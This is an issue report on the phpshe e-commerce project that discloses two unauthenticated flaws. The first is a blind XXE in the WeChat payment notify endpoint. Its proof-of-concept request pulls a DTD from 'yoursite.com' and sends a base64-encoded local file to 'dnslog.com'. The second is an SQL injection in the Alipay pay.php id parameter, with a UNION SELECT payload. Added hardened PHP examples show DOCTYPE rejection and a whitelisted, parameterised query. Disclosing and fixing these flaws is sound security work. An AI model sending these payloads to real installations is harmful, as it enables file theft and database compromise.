koyshe / phpshe

Two vulnerabilities without authentication

Backlog
Opened this issue 2019-03-10 11:42

0x01 blind XXE in /include/plugin/payment/wechat/notify_url.php

The XXE vulnerability is located in include/plugin/payment/wechat/notify_url.php, where the wechat_getxml function is called.

The wechat_getxml function is defined in hook/wechat.hook.php; it in turn calls the pe_getxml function.

The pe_getxml function is defined in include/function/global.func.php. It calls simplexml_load_string() to parse the XML read from php://input. If the libxml version is < 2.9.0, simplexml_load_string() resolves external entities in its default mode.

The PoC is as below:

```http
/phpshe1.7/include/plugin/payment/wechat/notify_url.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
...
Content-Type: application/xml
Content-Length: 257

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yoursite.com/test.dtd">
%dtd;
]>
<roottag>&send;</roottag>
```

test.dtd:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://dnslog.com/?%file;'>">
%all;
```

With this, any file readable by the web server process can be exfiltrated.
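For comparison, the following is an added example of how the same parsing step can be hardened; it is not phpshe's code. It stands in for the pe_getxml() pattern described above (simplexml_load_string() over untrusted XML from php://input), and it assumes a WeChat-style notify body with a flat `<xml>` root; the flattened-array return shape is an assumption, the real helper may differ.

```php
<?php
// Added example, not phpshe's code: a hardened stand-in for the pe_getxml()
// pattern (simplexml_load_string() over untrusted XML read from php://input).
declare(strict_types=1);

/**
 * Parse a payment notification body into a flat array of strings.
 * Returns null for anything that carries a DOCTYPE or fails to parse.
 */
function safe_getxml(string $raw): ?array
{
    // A payment notify body never needs a DTD, and every external-entity
    // technique depends on one, so refuse the document outright.
    if (preg_match('/<!DOCTYPE/i', $raw) === 1) {
        return null;
    }
    // On PHP < 8.0 external entity loading is a process-wide switch; turn it
    // off. PHP 8 disables it by default and deprecates the function.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    $previous = libxml_use_internal_errors(true);
    // LIBXML_NONET blocks network access while parsing. LIBXML_NOENT is
    // deliberately absent: passing it would substitute entities.
    $xml = simplexml_load_string($raw, 'SimpleXMLElement', LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if ($xml === false || $errors !== []) {
        return null;
    }
    // Flatten <xml><k>v</k>...</xml> into ['k' => 'v', ...]. The real helper's
    // return shape is an assumption; only the parsing options matter here.
    $out = [];
    foreach ($xml->children() as $name => $value) {
        $out[(string) $name] = (string) $value;
    }
    return $out;
}

// Constructed sample bodies, stand-ins for what php://input would carry.
$benign  = '<xml><out_trade_no>20190310001</out_trade_no>'
         . '<result_code>SUCCESS</result_code></xml>';
$withDtd = '<?xml version="1.0"?><!DOCTYPE xml [<!ENTITY e "x">]><xml><a>&e;</a></xml>';

var_dump(safe_getxml($benign));   // ['out_trade_no' => '20190310001', 'result_code' => 'SUCCESS']
var_dump(safe_getxml($withDtd));  // NULL: rejected before libxml ever sees the DTD
```

The DOCTYPE check is the belt and the libxml settings are the braces: on a libxml older than 2.9.0 the loader switch is what actually stops the external fetch, while on newer builds the upfront rejection keeps even internal-subset parameter entities out of the parser.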

0x02 SQL Injection in include/plugin/payment/alipay/pay.php with parameter id

The vulnerability is located in include/plugin/payment/alipay/pay.php and $order_id can be controlled.


Then the return value of order_table is concatenated directly into the SQL statement as the table name.

So the PoC is as below:

```
/include/plugin/payment/alipay/pay.php?id=pay`%20where%201=1%20union%20select%201,2,user(),4,5,6,7,8,9,10,11,12%23_
```
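The following is an added example of the defensive shape this lookup should have; it is not phpshe's code. It assumes an id layout of `<kind>_<digits>` (e.g. `pay_1001`) and a hypothetical two-entry table map, both stand-ins for whatever order_table really does; the point is that the table name comes from a constant map, never from the request, and the numeric part goes through a bound parameter. An in-memory SQLite database is constructed so the example runs without MySQL.

```php
<?php
// Added example, not phpshe's code: a defensive version of the
// "order_table() result concatenated into SQL as the table name" pattern.
declare(strict_types=1);

// Hypothetical whitelist: the only tables an order id may ever resolve to.
const ORDER_TABLES = [
    'order' => 'pe_order',
    'pay'   => 'pe_pay',
];

// Assumed id layout "<kind>_<digits>"; phpshe's real format may differ.
// Returns [table, numeric id] or null when the id is not well formed.
function order_table(string $id): ?array
{
    if (preg_match('/^([a-z]+)_(\d{1,12})$/', $id, $m) !== 1) {
        return null;               // backticks, spaces, comments: all rejected here
    }
    if (!isset(ORDER_TABLES[$m[1]])) {
        return null;               // unknown kind, no table lookup at all
    }
    return [ORDER_TABLES[$m[1]], (int) $m[2]];
}

function find_order(PDO $db, string $id): ?array
{
    $resolved = order_table($id);
    if ($resolved === null) {
        return null;
    }
    [$table, $num] = $resolved;
    // $table is a value from the constant map, so interpolating it is safe;
    // the user-controlled number is passed as a bound parameter.
    $stmt = $db->prepare("SELECT id, amount FROM `$table` WHERE id = ?");
    $stmt->execute([$num]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed fixture so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pe_pay (id INTEGER PRIMARY KEY, amount REAL)');
$db->exec('CREATE TABLE pe_order (id INTEGER PRIMARY KEY, amount REAL)');
$db->exec('INSERT INTO pe_pay VALUES (1001, 9.99)');

var_dump(find_order($db, 'pay_1001'));                         // ['id' => 1001, 'amount' => 9.99]
var_dump(find_order($db, 'pay` where 1=1 union select 1,2#_')); // NULL: rejected before any SQL is built
var_dump(find_order($db, 'pay_9999'));                         // NULL: well formed, no such row
```

Because the table is chosen by lookup rather than echoed from the request, the backtick-and-comment style of input shown in the PoC above never reaches the query string; the regex is the first gate and the constant map is the second.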

Comments (0)

wps2015 created task